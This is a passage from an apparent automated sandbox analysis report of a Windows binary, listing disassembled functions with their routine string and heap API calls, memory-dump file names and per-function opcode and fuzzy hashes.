                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D37CE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D37F7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D381D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D3843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: e95f666f5a10a6d415b3c7fb42a5b3b412c422bb22f86a55032d97a5a966b0e9
                                    • Instruction ID: d7ec671eb1a067ef1749a689e8e1cf186b3db173066ab12718575ba65011fed4
                                    • Opcode Fuzzy Hash: e95f666f5a10a6d415b3c7fb42a5b3b412c422bb22f86a55032d97a5a966b0e9
                                    • Instruction Fuzzy Hash: D7121970A116018FDB68CF19C558B25B7E0FF44328B19C2AED849DB3A2D772DD82CB41
                                    Function 008D7CA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7D14
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7D2F
                                      • Part of subcall function 008D7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008D7DD8
                                      • Part of subcall function 008D7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008D7DF6
                                      • Part of subcall function 008D7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008D7E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: string too long
                                    • API String ID: 909987262-2556327735
                                    • Opcode ID: 9a5a7d3baf7a47950042fe32fa6ed5f53ddb9dfddea695be702e393b40092d28
                                    • Instruction ID: 73a4ad301d95ac3e326f42972f56d21a3439ad87446eb98e7d1f40be29fbc757
                                    • Opcode Fuzzy Hash: 9a5a7d3baf7a47950042fe32fa6ed5f53ddb9dfddea695be702e393b40092d28
                                    • Instruction Fuzzy Hash: 8931D6723086549FE7249E6CE880A7AF7EAFF91760B204B2BF146C7745E7719C4083A5
                                    Function 008C6E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 008C6EB4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C6EBB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID: @
                                    • API String ID: 1357844191-2766056989
                                    • Opcode ID: a8116fde8d2ef7bfce7aad01d112ac484bda0a77c4e29ab38dce33c216a34c28
                                    • Instruction ID: 56cb2de248275378eee8ec2951cbc29fbfd21b29a765bd0482a55ca5bc4f8ca9
                                    • Opcode Fuzzy Hash: a8116fde8d2ef7bfce7aad01d112ac484bda0a77c4e29ab38dce33c216a34c28
                                    • Instruction Fuzzy Hash: F3216AB06106019BEB208B64D884FB773F8FB44705F44487CE946CB684FBB8E954CB51
                                    Function 008E2380 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E23CC
                                    • lstrlen.KERNEL32(00000000), ref: 008E2469
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E24F0
                                    • lstrlen.KERNEL32(00000000), ref: 008E24F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 0fb36797e768866636e631012867bb9a71a7924b6899c989d11b85fd6b382827
                                    • Instruction ID: df568c639ef65096ed12ad822b1e12a6c6897c902066b03e8e563aa82887b145
                                    • Opcode Fuzzy Hash: 0fb36797e768866636e631012867bb9a71a7924b6899c989d11b85fd6b382827
                                    • Instruction Fuzzy Hash: 2381F0B0E002499BDB10CF95C844BAEB7B9FF85314F1881ADE508E7381EB759D42CB95
                                    Function 008C1410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000), ref: 008C152D
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000,?), ref: 008C154F
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000,?), ref: 008C1571
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000,?), ref: 008C1593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 349658508d81b27d3c4a415c17e58a83425abbe3146bff082d537ccca0bce7c6
                                    • Instruction ID: 2b5a203c15de5d59601f3b3707840d8ff346903b30ae20431cc8495cc25b8efb
                                    • Opcode Fuzzy Hash: 349658508d81b27d3c4a415c17e58a83425abbe3146bff082d537ccca0bce7c6
                                    • Instruction Fuzzy Hash: F1319374A01B029FDB68DF7AD598A66BBF5FF49700700492DA956C3B51DB30F811CB84
                                    Function 008E1550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 008E1581
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E15B9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E15F1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E1629
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 7f30af614f903268fb4ef1295337f148870c2fd1855482a49088cd5490a3af4e
                                    • Instruction ID: 1e3884d2316601300b120b0100a94de37629ca0b410ada63da68ab4d56e2eaac
                                    • Opcode Fuzzy Hash: 7f30af614f903268fb4ef1295337f148870c2fd1855482a49088cd5490a3af4e
                                    • Instruction Fuzzy Hash: 0C21B9B4601B429BDB24DF6AC458F27B7F9FF85700B044A2CA496C7B90DB34E851CB91
                                    Function 008C1510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 008C152D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C154F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1571
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1593
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 954bd2259618aa86abad9451bdafa4f995c8ac289f54730faf89c4dfe44529ec
                                    • Instruction ID: 7b03ce94588b4cee0b77003503645133abeaa949f798340cc32272805f5bbabf
                                    • Opcode Fuzzy Hash: 954bd2259618aa86abad9451bdafa4f995c8ac289f54730faf89c4dfe44529ec
                                    • Instruction Fuzzy Hash: 0711ECB4A11B029BDB249FB9D45CE27B7F8FF85701704462DA456C7B51EB30E811CB90